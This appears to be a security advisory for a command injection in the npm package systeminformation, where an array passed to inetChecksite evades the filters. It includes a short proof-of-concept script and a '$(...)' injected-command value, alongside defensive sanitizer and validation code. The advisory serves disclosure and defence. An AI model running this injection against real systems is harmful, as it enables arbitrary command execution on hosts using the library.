systeminformation

vulnerability: command injection
severity: 8.8
language: javascript
registry: npm

Description

systeminformation is vulnerable to command injection.

It is possible to pass an array containing OS commands, which bypasses the filters.

Proof of Concept

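  1. Create a JavaScript file with the content below:

```javascript
const si = require('systeminformation');
// Placeholder from the report: replace <OS Command> in step 2.
const command = "$(<OS Command>)";
// The value is passed inside an array instead of as a plain string.
si.inetChecksite([command]);
```

  2. Edit the constant `command` with a desired OS command.

  3. Run it.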
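One way an array can slip past a string filter, shown beside the type check that closes the gap. This is an added example, not code from systeminformation or from the original report; the blocklist and the helpers `weakSanitize`, `strictSanitize` and `validateSiteUrl` are assumptions made for illustration.

```javascript
// Simplified per-character filter (assumed model, not the library's source).
const BLOCKED = new Set(['$', '(', ')', '`', ';', '|', '&', '<', '>', '\n']);

// Weak form: indexes its input without checking the type.
// For a string, input[i] is one character. For an array, input[i] is a whole
// element, which never equals a single blocked character and is kept intact.
function weakSanitize(input) {
  const s = input || '';
  let out = '';
  for (let i = 0; i < s.length; i++) {
    if (!BLOCKED.has(s[i])) out += s[i];
  }
  return out;
}

// Hardened form: reject anything that is not a primitive string first.
function strictSanitize(input) {
  if (typeof input !== 'string') {
    const kind = Array.isArray(input) ? 'array' : typeof input;
    throw new TypeError('expected a string, got ' + kind);
  }
  return weakSanitize(input);
}

// Caller-side guard (hypothetical helper): refuse values that needed
// filtering at all, then require a well-formed http(s) URL.
function validateSiteUrl(input) {
  const clean = strictSanitize(input);
  if (clean !== input) throw new Error('URL contains shell metacharacters');
  const url = new URL(clean); // throws on malformed input
  if (url.protocol !== 'http:' && url.protocol !== 'https:') {
    throw new Error('unsupported protocol');
  }
  return url.href;
}

// Constructed sample input; "id" stands in for the report's placeholder.
const sample = '$(id)';
console.log(JSON.stringify(weakSanitize(sample)));   // string: filtered
console.log(JSON.stringify(weakSanitize([sample]))); // array: unfiltered
```

Validating the type at the API boundary is only one layer; passing the value as a separate argument to `child_process.execFile` rather than interpolating it into a shell string removes the dependence on the filter.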
